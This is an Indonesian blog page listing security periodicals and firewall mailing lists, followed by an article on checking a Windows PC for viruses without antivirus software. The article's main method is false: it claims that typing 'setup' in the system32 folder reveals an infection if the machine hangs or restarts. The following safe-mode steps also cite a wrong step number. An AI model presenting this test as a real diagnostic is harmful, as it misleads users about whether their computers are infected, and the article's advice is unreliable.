XILISOFT VIDEO CONVERTER
http://www.xilisoft.com/
http://www.xilisoft.com/su​pport.html


FIREWALL
Security Periodicals
http://www.elsevier.nl/cat​alogue/
http://www.cl.cam.ac.uk/us​ers/rja14/#SR
http://www.gocsi.com/
http://www.drj.com/
http://www.infosecnews.com​/isn/MS7.HTML
http://www.isse.gmu.edu/~x​sis/jcs.html
http://www.virusbtn.com/


Maliing list
http://www.nfr.net/forum/f​irewall-wizards.html e-mail majordomo@nfr.net
http://www.ntbugtraq.com/
http://catless.ncl.ac.uk/r​isks
http://www.gretcircle.com/​firewalls


Update Artikel dari Grup Klikedukasi di Facebook:
List website diatas sumbangan dari:
Fands Lov | Facebook    

31 4 langkah Cek Virus Tanpa Antivirus

Berikut ini adalah cara melacak apakah komputer kita terkena virus atau tidak.

1. Buka command prompt dengan cara Start -> Run -> cmd.
Secara default, lokasi akan berada di C:\Documents and settings\nama_user, untuk itu anda harus pindah terlebih dahulu ke folder system32.

2. Ketikkan "cd c:\windows\system32" (tanpa tanda petik).
Tekan enter untuk masuk ke folder system32.

3. Ketik "setup" lalu tekan enter

4. Jika muncul tampilan gambar yang didalamnya ada peringatan "Please go to the Control Panel to install and configure system components." Berarti komputer anda sehat dari virus, tetapi jika komputer anda malah hang atau restart itu berarti ada virus yang bersemayam di komputer anda.

Lantas bagaimana jika komputer terdeteksi ada virusnya? Coba baca dulu cara membasmi virus brontok , secara garis besar caranya hampir sama seperti itu. Agar pengetahuan tentang virus lebih mendalam silahkan baca juga artikel tentang karakteristik umum virus.

Dari 2 referensi artikel di atas, secara umum langkah mudah penanganan komputer yang terkena virus adalah dengan melakukan scanning system dengan antivirus update. Tapi yang perlu diingat sebelum melakukan scanning dengan antivirus ada baiknya matikan dulu system restore-nya dan akan lebih bagus lagi jika proses scanning berjalan di atas safe mode. 

Cara masuk ke safe mode->
1. Restart PC
2. Saat awal booting tekan tombol F8
3. Jika langkah nomer 3 benar, akan keluar menu pilihan untuk masuk ke safe mode. 
4. Pilih menu safe mode dan tekan enter untuk mengeksekusi
5. Tunggu hingga tampilan desktop muncul

Update Artikel dari Grup Klikedukasi di Facebook:
Penulis Artikel ini:
Denih Handoko | Facebook    &  170p3'x   | Klikedukasi
 
© Klikedukasi 2008 - 2013 | Design by Panembahan Satyapradana | 170p3x